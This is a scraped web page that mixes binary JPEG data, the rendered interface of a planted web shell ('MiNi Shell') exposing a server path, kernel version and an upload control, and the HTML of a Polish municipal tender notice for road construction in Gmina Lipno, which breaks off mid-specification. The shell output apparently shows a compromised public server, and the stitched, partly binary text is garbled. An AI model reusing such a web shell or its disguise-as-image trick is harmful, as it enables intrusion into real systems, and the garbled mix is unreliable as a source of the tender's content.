JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240606/0035370601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i modernizacja dróg na terenie gminy Lipno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lipno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">54 2886200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">54 2872048</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lipno@uglipno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://uglipno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i modernizacja dróg na terenie gminy Lipno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aaed6dd5-23c9-11ef-a500-1a0072d5d2bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00353706</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00040907/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa drogi gminnej nr 170602C Karnkowo-Wierzbick</p> <p class="mb-0">1.1.5 Budowa i modernizacja dróg na terenie gminy Lipno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/uglipno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim za pośrednictwem Platformy zakupowej pod adresem https://platformazakupowa.pl/pn/uglipno. Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie na adres email: lipno@uglipno.pl lub za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego”. Dokumentacja niniejszego postępowania została opublikowana na Platformie. Szczegółowe informacje o sposobie porozumiewania się zamawiającego z wykonawcami oraz sposobie przekazywania oświadczeń i dokumentów zwarte są w SWZ. https://platformazakupowa.pl/pn/uglipno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy. <br/>2. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na https://platformazakupowa.pl/pn/uglipno przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM. <br/>3. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.: <br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, <br/>3) zainstalowana dowolna inna przeglądarka internetowa niż Internet Explorer, <br/>4) włączona obsługa JavaScript, <br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, <br/>6) szyfrowanie odbywa się za pomocą protokołu TLS 1.3. <br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. <br/>4. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: <br/>1) akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, <br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem https://platformazakupowa.pl/uploads/media/e68fd1901936718a1c9a0441ee106d890133d18f.pdf <br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych. <br/>6. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformamzakupowa.pl/strona/45-instrukcje. <br/>7. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania (znak sprawy).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, (Dz. Urz. UE L 119 z 04.05.2016), zwanego jako ,,RODO&#34; <br/>1) Administratorem danych osobowych osób fizycznych jest Wójt Gminy Lipno. 2)Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować pocztą elektroniczną na adres ochronadanych@uglipno.pl, <br/>3)Dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6ust. 1 lit. c rozporządzenia 2016/679 <br/>4) W odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia2016/679;<br/>5) Osoba fizyczna posiada: <br/>a) na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej dotyczących; <br/>b) na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych; <br/>c) na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679; <br/>6) Osobie fizycznej nie przysługuje: <br/>a) w związku z art. 17 ust. 3 lit.b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych; <br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679; <br/>c) na podstawie art. 21rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679. <br/>7). Wykonawca ubiegając się o udzielenie formalno-prawnych związanych z udziałem w postępowaniu, w tym również obowiązków wynikających z rozporządzenia 2016/679, w szczególności obowiązek informacyjny przewidziany w art. 13 rozporządzenia 2016/679 względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Obowiązek informacyjny wynikający z art. 13 rozporządzenia 2016/679 nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4 rozporządzenia 2016/679). 8).Wykonawca jest obowiązany wypełnić obowiązek informacyjny wynikający z art. 14 rozporządzenia 2016/679 względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 rozporządzenia 2016/679.<br/>9). W celu zapewnienia, że wykonawca wypełnił obowiązki informacyjne wynikające z rozporządzenia 2016/679 oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z ubieganiem się wykonawcy o udzielenie zamówienia w postępowaniu, wykonawca składa w postępowaniu oświadczenie o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 rozporządzenia 2016/679. Oświadczenie, o którym mowa w zdaniu pierwszym wykonawca składa w ofercie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.271.07.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 8972568,27 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Opis przedmiotu zamówienia stanowią: Przedmiotem zamówienia są roboty budowlane w zakresie budowy i modernizacji jedenastu odrębnych odcinków dróg gminnych”.<br/>2.	Opis przedmiotu zamówienia: „Budowa i modernizacja dróg na terenie gminy Lipno”: <br/>1)	Odcinek 1 – droga gminna nr 170505C Trzebiegoszcz–Konotopie<br/>•	ID działki: 040806_2.0032.35<br/>•	Długość 998 mb, <br/>•	Szerokość jezdni 3,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>2)	Odcinek 2 – droga gminna nr 170521C Białowieżyn–Lipno<br/>•	ID działek: 040806_2.0002.47. i 040806_2.0020.319<br/>•	Długość 1468 mb;<br/>•	Szerokość jezdni 3,5 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>3)	Odcinek 3 – drogi gminne nr 170543C Biskupin–Maliszewo i nr 170546C Biskupin–Maliszewo<br/>•	ID działek: 040806_2.0022.411, 040806_2.0022.408, 040806_2.0022.423.<br/>•	Długość 919+217 mb;<br/>•	Szerokość jezdni 4,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>4)	Odcinek 4 – droga gminna nr 170548C Żabieniec–Maliszewo–Trzebiegoszcz<br/>•	ID działek: 040806_2.0022.191, 040806_2.0032.229 <br/>•	Długość 931 mb;<br/>•	Szerokość jezdni 3,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>5)	Odcinek 5 – droga gminna nr 170555C Jankowo–Konotopie<br/>•	ID działek: 040806_2.0011.52 040806_2.0011.18<br/>•	Długość 993 mb;<br/>•	Szerokość jezdni 3,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>6)	Odcinek 6 – droga gminna nr 170562C Złotopole–Złotopole <br/>•	ID działki: 040806_2.0036.186/1<br/>•	Długość 322 mb;<br/>•	Szerokość jezdni 5,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>7)	Odcinek 7 – droga gminna nr 170602C Karnkowo–Wierzbick <br/>•	ID działek: 040806_2.0013.370 i 040806_2.0013.389 040806_2.0013.139/1.<br/>•	Długość 993 mb;<br/>•	Szerokość jezdni 4,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2= 80 MPa;<br/>•	Konstrukcja zjazdów:<br/> warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/> warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/> warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/> warstwa odcinająca z piasku gr. 10 cm.<br/> sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/> pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/> sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>8)	Odcinek 8 – droga gminna nr 170660 Łochocin–Łochocin<br/>•	ID działki: 040806_2.0021.320<br/>	Długość 663 mb;<br/>	Szerokość jezdni 3,0 m;<br/>	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 